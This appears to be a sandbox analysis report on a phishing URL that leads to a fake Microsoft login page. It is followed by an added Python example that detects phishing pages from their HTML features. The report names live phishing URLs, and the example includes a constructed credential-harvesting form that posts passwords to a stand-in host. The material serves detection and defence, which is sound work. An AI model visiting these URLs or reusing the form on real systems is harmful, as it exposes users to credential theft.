Windows Analysis Report https://473282.myshoptet.com/surelet01/

Overview

General Information

Sample URL: https://473282.myshoptet.com/surelet01/
Analysis ID: 502494

Most interesting Screenshot:

Detection

HTMLPhisher
Score: 76
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Phishing site detected (based on favicon image match)
Yara detected HtmlPhish10
Antivirus detection for URL or domain
Phishing site detected (based on image similarity)
HTML body contains low number of good links
Found iframes
No HTML title found
Form action URLs do not match main URL

Classification

Process Tree

  • System is w10x64
  • chrome.exe (PID: 6312 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation 'https://473282.myshoptet.com/surelet01/' MD5: C139654B5C1438A95B321BB01AD63EF6)
    • chrome.exe (PID: 6528 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1524,6113479614288932569,12517739123380968407,131072 --lang=en-GB --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1932 /prefetch:8 MD5: C139654B5C1438A95B321BB01AD63EF6)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: https://473282.myshoptet.com/surelet01/ | SlashNext: detection malicious, Label: Fake Login Page, type: Phishing & Social Engineering
Antivirus detection for URL or domain
Source: https://twotowersprotest.org/post/PDF/ | SlashNext: Label: Fake Login Page, type: Phishing & Social Engineering

Phishing:

Phishing site detected (based on favicon image match)
Source: https://twotowersprotest.org/post/PDF/ | Matcher: Template: microsoft matched with high similarity
Yara detected HtmlPhish10
Source: Yara match | File source: 50331.8.pages.csv, type: HTML
Phishing site detected (based on image similarity)
Source: https://twotowersprotest.org/post/PDF/ | Matcher: Found strong image similarity, brand: Microsoft, image: 50331.8.img.1.gfk.csv EE5C8D9FB6248C938FD0DC19370E90BD
HTML body contains low number of good links
Source: https://twotowersprotest.org/post/PDF/ | HTTP Parser: Number of links: 0
Found iframes
Source: https://www.shoptet.sk/?utm_source=footer&utm_medium=link&utm_campaign=create_by_shoptet | HTTP Parser: Iframe src: https://www.googletagmanager.com/ns.html?id=GTM-W8H93G
Source: https://www.shoptet.sk/?utm_source=footer&utm_medium=link&utm_campaign=create_by_shoptet | HTTP Parser: Iframe src: https://platform.twitter.com/widgets/widget_iframe.58065ae230495f5d9e4b6a916472b2c1.html?origin=https%3A%2F%2Fwww.shoptet.sk
Source: https://www.shoptet.sk/?utm_source=footer&utm_medium=link&utm_campaign=create_by_shoptet | HTTP Parser: Iframe src: //11189376.fls.doubleclick.net/activityi;src=11189376;type=invmedia;cat=rmkt_0;ord=7309702678925;gtm=2wgab0;auiddc=1347560484.1634163607;~oref=https%3A%2F%2Fwww.shoptet.sk%2F%3Futm_source%3Dfooter%26utm_medium%3Dlink%26utm_campaign%3Dcreate_by_shoptet?
Source: https://www.shoptet.sk/?utm_source=footer&utm_medium=link&utm_campaign=create_by_shoptet | HTTP Parser: Iframe src: https://vars.hotjar.com/box-acff0d328b74363875a0a6075e6c8439.html
No HTML title found
Source: https://473282.myshoptet.com/login/?backTo=%2Fsurelet01%2F | HTTP Parser: HTML title missing
Source: https://twotowersprotest.org/post/PDF/ | HTTP Parser: HTML title missing
Source: https://www.shoptet.sk/?utm_source=footer&utm_medium=link&utm_campaign=create_by_shoptet | HTTP Parser: HTML title missing
Source: https://473282.myshoptet.com/login/?backTo=%2F | HTTP Parser: HTML title missing
Source: https://twitter.com/intent/tweet?url= | HTTP Parser: HTML title missing
Form action URLs do not match main URL
Source: https://www.shoptet.sk/?utm_source=footer&utm_medium=link&utm_campaign=create_by_shoptet | HTTP Parser: Form action: https://www.facebook.com/tr/ shoptet facebook
Source: https://473282.myshoptet.com/login/?backTo=%2Fsurelet01%2F | HTTP Parser: No <meta name="author".. found
Source: https://twotowersprotest.org/post/PDF/ | HTTP Parser: No <meta name="author".. found
Source: https://473282.myshoptet.com/login/?backTo=%2F | HTTP Parser: No <meta name="author".. found
Source: https://twitter.com/intent/tweet?url= | HTTP Parser: No <meta name="author".. found
Source: https://473282.myshoptet.com/login/?backTo=%2Fsurelet01%2F | HTTP Parser: No <meta name="copyright".. found
Source: https://twotowersprotest.org/post/PDF/ | HTTP Parser: No <meta name="copyright".. found
Source: https://473282.myshoptet.com/login/?backTo=%2F | HTTP Parser: No <meta name="copyright".. found
Source: https://twitter.com/intent/tweet?url= | HTTP Parser: No <meta name="copyright".. found
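The HTTP Parser findings above (missing title, zero good links, iframes present, form action on a different host, missing author/copyright meta tags) are static page heuristics that can be reproduced outside the sandbox. The following is an added example, not Joe Sandbox code and not the sample's own HTML: it extracts those features from a page with the standard library and reports which heuristics fire. The link-count threshold and the two HTML documents are constructed assumptions; the product's real scoring rules are not published on this page.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Assumed cut-off for "low number of good links"; the sandbox's real threshold is not public.
GOOD_LINK_THRESHOLD = 5


class PageFeatureParser(HTMLParser):
    """Collects the HTML features the report's HTTP Parser signatures look at."""

    def __init__(self):
        super().__init__()
        self.title_text = ""
        self._in_title = False
        self.hrefs = []
        self.iframe_srcs = []
        self.form_actions = []
        self.meta_names = set()

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "title":
            self._in_title = True
        elif tag == "a" and "href" in a:
            self.hrefs.append(a["href"])
        elif tag == "iframe":
            self.iframe_srcs.append(a.get("src", ""))
        elif tag == "form":
            self.form_actions.append(a.get("action", ""))
        elif tag == "meta" and "name" in a:
            self.meta_names.add(a["name"].lower())

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title_text += data


def _host(url):
    return urlsplit(url).hostname or ""


def analyze(page_url, html):
    """Return the heuristic results for one fetched page (url + body)."""
    p = PageFeatureParser()
    p.feed(html)
    p.close()
    page_host = _host(page_url)

    # A "good" link resolves to a real http(s) destination; "#" and javascript: do not count.
    good_links = []
    for href in p.hrefs:
        h = href.strip()
        resolved = urljoin(page_url, h)
        if h not in ("", "#") and urlsplit(resolved).scheme in ("http", "https"):
            good_links.append(resolved)

    # "Form action URLs do not match main URL": the action resolves to another host.
    # An empty action posts back to the page itself, so it is never a mismatch.
    foreign_actions = []
    for action in p.form_actions:
        target = urljoin(page_url, action.strip()) if action.strip() else page_url
        if _host(target) != page_host:
            foreign_actions.append(target)

    return {
        "html_title_missing": not p.title_text.strip(),
        "low_good_links": len(good_links) < GOOD_LINK_THRESHOLD,
        "good_link_count": len(good_links),
        "iframes_found": bool(p.iframe_srcs),
        "iframe_srcs": p.iframe_srcs,
        "form_action_mismatch": bool(foreign_actions),
        "foreign_form_actions": foreign_actions,
        "meta_author_missing": "author" not in p.meta_names,
        "meta_copyright_missing": "copyright" not in p.meta_names,
    }


def triggered(page_url, html):
    """Sorted names of the heuristics that fired, for a one-line summary."""
    return sorted(k for k, v in analyze(page_url, html).items() if v is True)


# Constructed sample: a bare credential-harvesting page in the shape the report describes
# (no title, no outbound links, hidden iframe, form posting to a third-party host).
PHISH_URL = "https://victim-lookalike.example/post/PDF/"
PHISH_HTML = """<html><head><meta charset="utf-8"></head><body>
<div class="brand"><img src="logo.png" alt="Microsoft"></div>
<form method="post" action="https://collector.example/login.php">
  <input name="email"><input name="passwd" type="password"><button>Sign in</button>
</form>
<iframe src="https://tracker.example/frame.html" style="display:none"></iframe>
</body></html>"""

# Constructed sample: an ordinary shop login whose form posts back to its own host.
BENIGN_URL = "https://shop.example/login/"
BENIGN_HTML = """<html><head><title>Shop login</title>
<meta name="author" content="Shop team"><meta name="copyright" content="Shop Ltd"></head>
<body><form method="post" action="/login/"><input name="user"><input name="pw"></form>
<a href="/">Home</a><a href="/about/">About</a><a href="/contact/">Contact</a>
<a href="/terms/">Terms</a><a href="https://blog.shop.example/">Blog</a><a href="#">Top</a>
</body></html>"""

if __name__ == "__main__":
    for url, doc in ((PHISH_URL, PHISH_HTML), (BENIGN_URL, BENIGN_HTML)):
        print(url, "->", ", ".join(triggered(url, doc)) or "nothing fired")
```

On the constructed phishing page every heuristic fires, including the cross-host form action, which is the single most useful of these signals: a lookalike login page almost always has to ship the captured credentials to a host the victim never typed. The benign page trips none of them. As the shoptet.sk entries in the report show, iframes and third-party form actions also occur on legitimate sites with analytics embeds, so these checks are scoring inputs, not verdicts on their own.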